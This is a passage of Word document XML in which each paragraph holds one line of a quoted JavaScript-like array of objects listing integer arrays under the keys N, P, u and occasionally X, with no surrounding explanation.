    <w:p w14:paraId="1694AD8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D31253" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72F004" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E9895" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 12, 128, 143, 329, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE0386A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0FB66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B194293" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631BBA4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C75409" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFABA5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B98B2A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C09B496" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 5, 159, 176, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61C020" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0014592E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ADED1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E3C3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E09DB4E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F35CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2FB39F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A8C70" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 13, 14, 17, 18, 20, 21, 53, 159, 265, 297, 311, 317, 351]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BA8EF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A5665" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A125ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138C8A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7629BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B787E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA7542" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743125A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7DD50E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226330DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256394B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E0D620" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C836855" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846757F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02166334" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE8821B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [20, 26, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D412D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E38218" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02B134" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1454F39B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 10, 11, 200, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A124160" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4962BEF7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C44E152" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984ED98" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 7, 8, 100, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B9BC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB4575E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608899F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7387C3B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C30A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6393432B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384B3EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F71C68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 23, 27, 71, 108, 134, 219, 232, 260, 298, 303, 319, 343]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07099A0D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16679727" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E7003" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 6, 8, 9, 10, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBE972" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 7, 11, 12, 17, 26, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7A9C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24384E52" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F216746" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F83A6D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A49212" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C84A211" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A44BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073BC2FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB3D321" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB75873" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C92E36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE9FF7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B921C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18310BAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99949C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE6F752" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 6, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AAC5AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E633A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E178B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E00939" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEB145" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71734FAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC46EBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9907E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E891C65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D133ABC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C13BCE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31200AE7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [21, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354F1B2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D296B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EBDC1E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68403E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 6, 8, 13, 21, 24]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40756018" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F43CD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE6F20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789FDDC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 64, 93, 100, 129, 147, 153, 229, 249, 270, 279, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCB597" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F456F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31879C9A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F7B5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15, 21, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C7A33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B68C115" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC41235" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB2AFC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [27, 250, 298]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACD412" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F509E2A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 11,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0931E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 9, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8A212" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 5, 6, 7, 8, 9, 10, 12, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E3A8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 317, 320]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8EB91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B720A4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101B950" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2EF26E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 12, 16, 27, 78]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46171A90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62CD6A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6F6A2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2948EDD5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8C1AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [42, 79]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AAD4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626C692" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489CD54F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B024B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 321]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D8BB2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665183D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F9733" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413884D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 4, 7, 8, 9, 10, 11, 12, 13, 17, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C71E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB9E621" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE89EF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE58BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F0601" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
